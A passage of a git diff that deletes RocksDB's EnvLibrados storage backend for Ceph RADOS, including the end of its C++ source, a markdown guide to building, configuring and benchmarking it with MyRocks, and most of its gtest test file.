-  Status s = Status::OK();
-
-  do {
-    s = _GetFid(dir, fid);
-    if (Status::NotFound() != s) {
-      break;
-    }
-
-    s = _AddFid(dir, DIR_ID_VALUE);
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief delete dir
- * @details
- *
- * @param dirname [description]
- * @return [description]
- */
-Status EnvLibrados::DeleteDir(const std::string& dirname)
-{
-  LOG_DEBUG("[IN]%s\n", dirname.c_str());
-  std::string fid, dir, file;
-  split(dirname + "/temp", &dir, &file);
-  Status s = Status::OK();
-
-  s = _GetFid(dir, fid);
-
-  if (s.ok() && DIR_ID_VALUE == fid) {
-    std::vector<std::string> subs;
-    s = _GetSubFnames(dir, &subs);
-    // if subfiles exist, can't delete dir
-    if (subs.size() > 0) {
-      s = Status::IOError();
-    } else {
-      s = _DelFid(dir);
-    }
-  } else {
-    s = Status::NotFound();
-  }
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief return file size
- * @details [long description]
- *
- * @param fname [description]
- * @param file_size [description]
- *
- * @return [description]
- */
-Status EnvLibrados::GetFileSize(
-  const std::string& fname,
-  uint64_t* file_size)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  time_t mtime;
-  Status s;
-
-  do {
-    std::string fpath = dir + "/" + file;
-    s = _GetFid(fpath, fid);
-
-    if (!s.ok()) {
-      break;
-    }
-
-    int ret = _GetIoctx(fpath)->stat(fid, file_size, &mtime);
-    if (ret < 0) {
-      LOG_DEBUG("%i\n", ret);
-      if (-ENOENT == ret) {
-        *file_size = 0;
-        s = Status::OK();
-      } else {
-        s = err_to_status(ret);
-      }
-    } else {
-      s = Status::OK();
-    }
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s|%lld\n", s.ToString().c_str(), (long long)*file_size);
-  return s;
-}
-
-/**
- * @brief get file modification time
- * @details [long description]
- *
- * @param fname [description]
- * @param file_mtime [description]
- *
- * @return [description]
- */
-Status EnvLibrados::GetFileModificationTime(const std::string& fname,
-    uint64_t* file_mtime)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  time_t mtime;
-  uint64_t file_size;
-  Status s = Status::OK();
-  do {
-    std::string fpath = dir + "/" + file;
-    s = _GetFid(dir + "/" + file, fid);
-
-    if (!s.ok()) {
-      break;
-    }
-
-    int ret = _GetIoctx(fpath)->stat(fid, &file_size, &mtime);
-    if (ret < 0) {
-      if (Status::NotFound() == err_to_status(ret)) {
-        *file_mtime = static_cast<uint64_t>(mtime);
-        s = Status::OK();
-      } else {
-        s = err_to_status(ret);
-      }
-    } else {
-      s = Status::OK();
-    }
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief rename file
- * @details
- *
- * @param src [description]
- * @param target_in [description]
- *
- * @return [description]
- */
-Status EnvLibrados::RenameFile(
-  const std::string& src,
-  const std::string& target_in)
-{
-  LOG_DEBUG("[IN]%s => %s\n", src.c_str(), target_in.c_str());
-  std::string src_fid, tmp_fid, src_dir, src_file, dst_dir, dst_file;
-  split(src, &src_dir, &src_file);
-  split(target_in, &dst_dir, &dst_file);
-
-  auto s = _RenameFid(src_dir + "/" + src_file,
-                      dst_dir + "/" + dst_file);
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief not support
- * @details [long description]
- *
- * @param src [description]
- * @param target_in [description]
- *
- * @return [description]
- */
-Status EnvLibrados::LinkFile(
-  const std::string& src,
-  const std::string& target_in)
-{
-  LOG_DEBUG("[IO]%s => %s\n", src.c_str(), target_in.c_str());
-  return Status::NotSupported();
-}
-
-/**
- * @brief lock file. create if missing.
- * @details [long description]
- *
- * It seems that LockFile is used for preventing other instance of RocksDB
- * from opening up the database at the same time. From RocksDB source code,
- * the invokes of LockFile are at following locations:
- *
- *  ./db/db_impl.cc:1159:    s = env_->LockFile(LockFileName(dbname_), &db_lock_);    // DBImpl::Recover
- *  ./db/db_impl.cc:5839:  Status result = env->LockFile(lockname, &lock);            // Status DestroyDB
- *
- * When db recovery and db destroy, RocksDB will call LockFile
- *
- * @param fname [description]
- * @param lock [description]
- *
- * @return [description]
- */
-Status EnvLibrados::LockFile(
-  const std::string& fname,
-  FileLock** lock)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  Status s = Status::OK();
-
-  do {
-    std::string fpath = dir + "/" + file;
-    s = _GetFid(fpath, fid);
-
-    if (Status::OK() != s &&
-        Status::NotFound() != s) {
-      break;
-    } else if (Status::NotFound() == s) {
-      s = _AddFid(fpath, _CreateFid());
-      if (!s.ok()) {
-        break;
-      }
-    } else if (Status::OK() == s && DIR_ID_VALUE == fid) {
-      s = Status::IOError();
-      break;
-    }
-
-    *lock = new LibradosFileLock(_GetIoctx(fpath), fpath);
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief unlock file
- * @details [long description]
- *
- * @param lock [description]
- * @return [description]
- */
-Status EnvLibrados::UnlockFile(FileLock* lock)
-{
-  LOG_DEBUG("[IO]%p\n", lock);
-  if (nullptr != lock) {
-    delete lock;
-  }
-  return Status::OK();
-}
-
-
-/**
- * @brief not support
- * @details [long description]
- *
- * @param db_path [description]
- * @param output_path [description]
- *
- * @return [description]
- */
-Status EnvLibrados::GetAbsolutePath(
-  const std::string& db_path,
-  std::string* output_path)
-{
-  LOG_DEBUG("[IO]%s\n", db_path.c_str());
-  return Status::NotSupported();
-}
-
-/**
- * @brief Get default EnvLibrados
- * @details [long description]
- * @return [description]
- */
-EnvLibrados* EnvLibrados::Default() {
-  static EnvLibrados default_env(default_db_name,
-                                 std::getenv(default_config_path),
-                                 default_pool_name);
-  return &default_env;
-}
-}
\ No newline at end of file
diff --git a/thirdparty/rocksdb/utilities/env_librados.md b/thirdparty/rocksdb/utilities/env_librados.md
deleted file mode 100644
index 45a2a7b..0000000
--- a/thirdparty/rocksdb/utilities/env_librados.md
+++ /dev/null
@@ -1,122 +0,0 @@
-# Introduce to EnvLibrados
-EnvLibrados is a customized RocksDB Env to use RADOS as the backend file system of RocksDB. It overrides all file system related API of default Env. The easiest way to use it is just like following:
-```c++
-std::string db_name = "test_db";
-std::string config_path = "path/to/ceph/config";
-DB* db;
-Options options;
-options.env = EnvLibrados(db_name, config_path);
-Status s = DB::Open(options, kDBPath, &db);
-...
-```
-Then EnvLibrados will forward all file read/write operation to the RADOS cluster assigned by config_path. Default pool is db_name+"_pool".
-
-# Options for EnvLibrados
-There are some options that users could set for EnvLibrados.
-- write_buffer_size. This variable is the max buffer size for WritableFile. After reaching the buffer_max_size, EnvLibrados will sync buffer content to RADOS, then clear buffer.
-- db_pool. Rather than using default pool, users could set their own db pool name
-- wal_dir. The dir for WAL files. Because RocksDB only has 2-level structure (dir_name/file_name), the format of wal_dir is "/dir_name"(CAN'T be "/dir1/dir2"). Default wal_dir is "/wal".
-- wal_pool. Corresponding pool name for WAL files. Default value is db_name+"_wal_pool"
-
-The example of setting options looks like following:
-```c++
-db_name = "test_db";
-db_pool = db_name+"_pool";
-wal_dir = "/wal";
-wal_pool = db_name+"_wal_pool";
-write_buffer_size = 1 << 20;
-env_ = new EnvLibrados(db_name, config, db_pool, wal_dir, wal_pool, write_buffer_size);
-
-DB* db;
-Options options;
-options.env = env_;
-// The last level dir name should match the dir name in prefix_pool_map
-options.wal_dir = "/tmp/wal";                    
-
-// open DB
-Status s = DB::Open(options, kDBPath, &db);
-...
-```
-
-# Performance Test
-## Compile
-Check this [link](https://github.com/facebook/rocksdb/blob/master/INSTALL.md) to install the dependencies of RocksDB. Then you can compile it by running `$ make env_librados_test ROCKSDB_USE_LIBRADOS=1` under `rocksdb\`. The configure file used by env_librados_test is `../ceph/src/ceph.conf`. For Ubuntu 14.04, just run following commands:
-```bash
-$ sudo apt-get install libgflags-dev
-$ sudo apt-get install libsnappy-dev
-$ sudo apt-get install zlib1g-dev
-$ sudo apt-get install libbz2-dev
-$ make env_librados_test ROCKSDB_USE_LIBRADOS=1
-```
-
-## Test Result
-My test environment is Ubuntu 14.04 in VirtualBox with 8 cores and 8G RAM. Following is the test result.
-
-1. Write (1<<20) keys in random order. The time of writing under default env is around 10s while the time of writing under EnvLibrados is varying from 10s to 30s.
-
-2. Write (1<<20) keys in sequential order. The time of writing under default env drops to arround 1s. But the time of writing under EnvLibrados is not changed. 
-
-3. Read (1<<16) keys from (1<<20) keys in random order. The time of reading under both Envs are roughly the same, around 1.8s.
-
-# MyRocks Test
-## Compile Ceph
-See [link](http://docs.ceph.com/docs/master/install/build-ceph/)
-
-## Start RADOS
-
-```bash
-cd ceph-path/src
-( ( ./stop.sh; rm -rf dev/*; CEPH_NUM_OSD=3 ./vstart.sh --short --localhost -n
--x -d ; ) ) 2>&1
-```
-
-## Compile MySQL
-
-```bash
-sudo apt-get update
-sudo apt-get install g++ cmake libbz2-dev libaio-dev bison \
-zlib1g-dev libsnappy-dev 
-sudo apt-get install libgflags-dev libreadline6-dev libncurses5-dev \
-libssl-dev liblz4-dev gdb git
-
-git clone https://github.com/facebook/mysql-5.6.git
-cd mysql-5.6
-git submodule init
-git submodule update
-cmake . -DCMAKE_BUILD_TYPE=RelWithDebInfo -DWITH_SSL=system \
--DWITH_ZLIB=bundled -DMYSQL_MAINTAINER_MODE=0 -DENABLED_LOCAL_INFILE=1 -DROCKSDB_USE_LIBRADOS=1
-make install -j8
-```
-
-Check this [link](https://github.com/facebook/mysql-5.6/wiki/Build-Steps) for latest compile steps.
-
-## Configure MySQL
-Following is the steps of configuration of MySQL.
-
-```bash
-mkdir -p /etc/mysql
-mkdir -p /var/lib/mysql
-mkdir -p /etc/mysql/conf.d
-echo -e '[mysqld_safe]\nsyslog' > /etc/mysql/conf.d/mysqld_safe_syslog.cnf
-cp /usr/share/mysql/my-medium.cnf /etc/mysql/my.cnf
-sed -i 's#.*datadir.*#datadir = /var/lib/mysql#g' /etc/mysql/my.cnf
-chown mysql:mysql -R /var/lib/mysql
-
-mysql_install_db --user=mysql --ldata=/var/lib/mysql/
-export CEPH_CONFIG_PATH="path/of/ceph/config/file"
-mysqld_safe -user=mysql --skip-innodb --rocksdb --default-storage-engine=rocksdb --default-tmp-storage-engine=MyISAM &
-mysqladmin -u root password
-mysql -u root -p
-```
-
-Check this [link](https://gist.github.com/shichao-an/f5639ecd551496ac2d70) for detail information.
-
-```sql
-show databases;
-create database testdb;
-use testdb;
-show tables;
-CREATE TABLE tbl (id INT AUTO_INCREMENT primary key, str VARCHAR(32));
-insert into tbl values (1, "val2");
-select * from tbl;
-```
diff --git a/thirdparty/rocksdb/utilities/env_librados_test.cc b/thirdparty/rocksdb/utilities/env_librados_test.cc
deleted file mode 100644
index 7d9b252..0000000
--- a/thirdparty/rocksdb/utilities/env_librados_test.cc
+++ /dev/null
@@ -1,1146 +0,0 @@
-//  Copyright (c) 2016, Red Hat, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/env_librados.h"
-#include <rados/librados.hpp>
-#include "env/mock_env.h"
-#include "util/testharness.h"
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/options.h"
-#include "util/random.h"
-#include <chrono>
-#include <ostream>
-#include "rocksdb/utilities/transaction_db.h"
-
-class Timer {
-  typedef std::chrono::high_resolution_clock high_resolution_clock;
-  typedef std::chrono::milliseconds milliseconds;
-public:
-  explicit Timer(bool run = false)
-  {
-    if (run)
-      Reset();
-  }
-  void Reset()
-  {
-    _start = high_resolution_clock::now();
-  }
-  milliseconds Elapsed() const
-  {
-    return std::chrono::duration_cast<milliseconds>(high_resolution_clock::now() - _start);
-  }
-  template <typename T, typename Traits>
-  friend std::basic_ostream<T, Traits>& operator<<(std::basic_ostream<T, Traits>& out, const Timer& timer)
-  {
-    return out << timer.Elapsed().count();
-  }
-private:
-  high_resolution_clock::time_point _start;
-};
-
-namespace rocksdb {
-
-class EnvLibradosTest : public testing::Test {
-public:
-  // we will use all of these below
-  const std::string db_name = "env_librados_test_db";
-  const std::string db_pool = db_name + "_pool";
-  const char *keyring = "admin";
-  const char *config = "../ceph/src/ceph.conf";
-
-  EnvLibrados* env_;
-  const EnvOptions soptions_;
-
-  EnvLibradosTest()
-    : env_(new EnvLibrados(db_name, config, db_pool)) {
-  }
-  ~EnvLibradosTest() {
-    delete env_;
-    librados::Rados rados;
-    int ret = 0;
-    do {
-      ret = rados.init("admin"); // just use the client.admin keyring
-      if (ret < 0) { // let's handle any error that might have come back
-        std::cerr << "couldn't initialize rados! error " << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      ret = rados.conf_read_file(config);
-      if (ret < 0) {
-        // This could fail if the config file is malformed, but it'd be hard.
-        std::cerr << "failed to parse config file " << config
-                  << "! error" << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      /*
-       * next, we actually connect to the cluster
-       */
-
-      ret = rados.connect();
-      if (ret < 0) {
-        std::cerr << "couldn't connect to cluster! error " << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      /*
-       * And now we're done, so let's remove our pool and then
-       * shut down the connection gracefully.
-       */
-      int delete_ret = rados.pool_delete(db_pool.c_str());
-      if (delete_ret < 0) {
-        // be careful not to
-        std::cerr << "We failed to delete our test pool!" << db_pool << delete_ret << std::endl;
-        ret = EXIT_FAILURE;
-      }
-    } while (0);
-  }
-};
-
-TEST_F(EnvLibradosTest, Basics) {
-  uint64_t file_size;
-  unique_ptr<WritableFile> writable_file;
-  std::vector<std::string> children;
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-  // Check that the directory is empty.
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/non_existent"));
-  ASSERT_TRUE(!env_->GetFileSize("/dir/non_existent", &file_size).ok());
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(0U, children.size());
-
-  // Create a file.
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  writable_file.reset();
-
-  // Check that the file exists.
-  ASSERT_OK(env_->FileExists("/dir/f"));
-  ASSERT_OK(env_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(0U, file_size);
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-
-  // Write to the file.
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("abc"));
-  writable_file.reset();
-
-
-  // Check for expected size.
-  ASSERT_OK(env_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-
-  // Check that renaming works.
-  ASSERT_TRUE(!env_->RenameFile("/dir/non_existent", "/dir/g").ok());
-  ASSERT_OK(env_->RenameFile("/dir/f", "/dir/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/f"));
-  ASSERT_OK(env_->FileExists("/dir/g"));
-  ASSERT_OK(env_->GetFileSize("/dir/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that opening non-existent file fails.
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  ASSERT_TRUE(
-    !env_->NewSequentialFile("/dir/non_existent", &seq_file, soptions_).ok());
-  ASSERT_TRUE(!seq_file);
-  ASSERT_TRUE(!env_->NewRandomAccessFile("/dir/non_existent", &rand_file,
-                                         soptions_).ok());
-  ASSERT_TRUE(!rand_file);
-
-  // Check that deleting works.
-  ASSERT_TRUE(!env_->DeleteFile("/dir/non_existent").ok());
-  ASSERT_OK(env_->DeleteFile("/dir/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/g"));
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(0U, children.size());
-  ASSERT_OK(env_->DeleteDir("/dir"));
-}
-
-TEST_F(EnvLibradosTest, ReadWrite) {
-  unique_ptr<WritableFile> writable_file;
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  Slice result;
-  char scratch[100];
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("hello "));
-  ASSERT_OK(writable_file->Append("world"));
-  writable_file.reset();
-
-  // Read sequentially.
-  ASSERT_OK(env_->NewSequentialFile("/dir/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(seq_file->Skip(1));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Try reading past EOF.
-  ASSERT_EQ(0U, result.size());
-  ASSERT_OK(seq_file->Skip(100));  // Try to skip past end of file.
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));
-  ASSERT_EQ(0U, result.size());
-
-  // Random reads.
-  ASSERT_OK(env_->NewRandomAccessFile("/dir/f", &rand_file, soptions_));
-  ASSERT_OK(rand_file->Read(6, 5, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(rand_file->Read(0, 5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(rand_file->Read(10, 100, &result, scratch));  // Read "d".
-  ASSERT_EQ(0, result.compare("d"));
-
-  // Too high offset.
-  ASSERT_OK(rand_file->Read(1000, 5, &result, scratch));
-}
-
-TEST_F(EnvLibradosTest, Locks) {
-  FileLock* lock = nullptr;
-  unique_ptr<WritableFile> writable_file;
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(env_->LockFile("some file", &lock));
-  ASSERT_OK(env_->UnlockFile(lock));
-
-  ASSERT_OK(env_->LockFile("/dir/f", &lock));
-  ASSERT_OK(env_->UnlockFile(lock));
-}
-
-TEST_F(EnvLibradosTest, Misc) {
-  std::string test_dir;
-  ASSERT_OK(env_->GetTestDirectory(&test_dir));
-  ASSERT_TRUE(!test_dir.empty());
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_TRUE(!env_->NewWritableFile("/a/b", &writable_file, soptions_).ok());
-
-  ASSERT_OK(env_->NewWritableFile("/a", &writable_file, soptions_));
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(writable_file->Sync());
-  ASSERT_OK(writable_file->Flush());
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-}
-
-TEST_F(EnvLibradosTest, LargeWrite) {
-  const size_t kWriteSize = 300 * 1024;
-  char* scratch = new char[kWriteSize * 2];
-
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, 'h');
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->CreateDir("/dir"));
-  ASSERT_OK(env_->NewWritableFile("/dir/g", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("foo"));
-  ASSERT_OK(writable_file->Append(write_data));
-  writable_file.reset();
-
-  unique_ptr<SequentialFile> seq_file;
-  Slice result;
-  ASSERT_OK(env_->NewSequentialFile("/dir/g", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(3, &result, scratch));  // Read "foo".
-  ASSERT_EQ(0, result.compare("foo"));
-
-  size_t read = 0;
-  std::string read_data;
-  while (read < kWriteSize) {
-    ASSERT_OK(seq_file->Read(kWriteSize - read, &result, scratch));
-    read_data.append(result.data(), result.size());
-    read += result.size();
-  }
-  ASSERT_TRUE(write_data == read_data);
-  delete[] scratch;
-}
-
-TEST_F(EnvLibradosTest, FrequentlySmallWrite) {
-  const size_t kWriteSize = 1 << 10;
-  char* scratch = new char[kWriteSize * 2];
-
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, 'h');
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->CreateDir("/dir"));
-  ASSERT_OK(env_->NewWritableFile("/dir/g", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("foo"));
-
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    ASSERT_OK(writable_file->Append("h"));
-  }
-  writable_file.reset();
-
-  unique_ptr<SequentialFile> seq_file;
-  Slice result;
-  ASSERT_OK(env_->NewSequentialFile("/dir/g", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(3, &result, scratch));  // Read "foo".
-  ASSERT_EQ(0, result.compare("foo"));
-
-  size_t read = 0;
-  std::string read_data;
-  while (read < kWriteSize) {
-    ASSERT_OK(seq_file->Read(kWriteSize - read, &result, scratch));
-    read_data.append(result.data(), result.size());
-    read += result.size();
-  }
-  ASSERT_TRUE(write_data == read_data);
-  delete[] scratch;
-}
-
-TEST_F(EnvLibradosTest, Truncate) {
-  const size_t kWriteSize = 300 * 1024;
-  const size_t truncSize = 1024;
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, 'h');
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->CreateDir("/dir"));
-  ASSERT_OK(env_->NewWritableFile("/dir/g", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append(write_data));
-  ASSERT_EQ(writable_file->GetFileSize(), kWriteSize);
-  ASSERT_OK(writable_file->Truncate(truncSize));
-  ASSERT_EQ(writable_file->GetFileSize(), truncSize);
-  writable_file.reset();
-}
-
-TEST_F(EnvLibradosTest, DBBasics) {
-  std::string kDBPath = "/tmp/DBBasics";
-  DB* db;
-  Options options;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options.IncreaseParallelism();
-  options.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options.create_if_missing = true;
-  options.env = env_;
-
-  // open DB
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-
-  // Put key-value
-  s = db->Put(WriteOptions(), "key1", "value");
-  assert(s.ok());
-  std::string value;
-  // get value
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.ok());
-  assert(value == "value");
-
-  // atomically apply a set of updates
-  {
-    WriteBatch batch;
-    batch.Delete("key1");
-    batch.Put("key2", value);
-    s = db->Write(WriteOptions(), &batch);
-  }
-
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.IsNotFound());
-
-  db->Get(ReadOptions(), "key2", &value);
-  assert(value == "value");
-
-  delete db;
-}
-
-TEST_F(EnvLibradosTest, DBLoadKeysInRandomOrder) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 10;
-  Timer timer(false);
-  std::cout << "Test size : loop(" << max_loop << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBLoadKeysInRandomOrder1";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    snprintf(key,
-             20,
-             "%16lx",
-             (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-    snprintf(value,
-             20,
-             "%16lx",
-             (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-    // Put key-value
-    s1 = db1->Put(WriteOptions(), key, value);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBLoadKeysInRandomOrder2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    snprintf(key,
-             20,
-             "%16lx",
-             (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-    snprintf(value,
-             20,
-             "%16lx",
-             (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-    // Put key-value
-    s2 = db2->Put(WriteOptions(), key, value);
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-TEST_F(EnvLibradosTest, DBBulkLoadKeysInRandomOrder) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 6;
-  int bulk_size = 1 << 15;
-  Timer timer(false);
-  std::cout << "Test size : loop(" << max_loop << "); bulk_size(" << bulk_size << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBBulkLoadKeysInRandomOrder1";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s1 = db1->Write(WriteOptions(), &batch);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBBulkLoadKeysInRandomOrder2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s2 = db2->Write(WriteOptions(), &batch);
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-TEST_F(EnvLibradosTest, DBBulkLoadKeysInSequentialOrder) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 6;
-  int bulk_size = 1 << 15;
-  Timer timer(false);
-  std::cout << "Test size : loop(" << max_loop << "); bulk_size(" << bulk_size << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBBulkLoadKeysInSequentialOrder1";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%019lld",
-               (long long)(i * bulk_size + j));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s1 = db1->Write(WriteOptions(), &batch);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBBulkLoadKeysInSequentialOrder2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  timer.Reset();
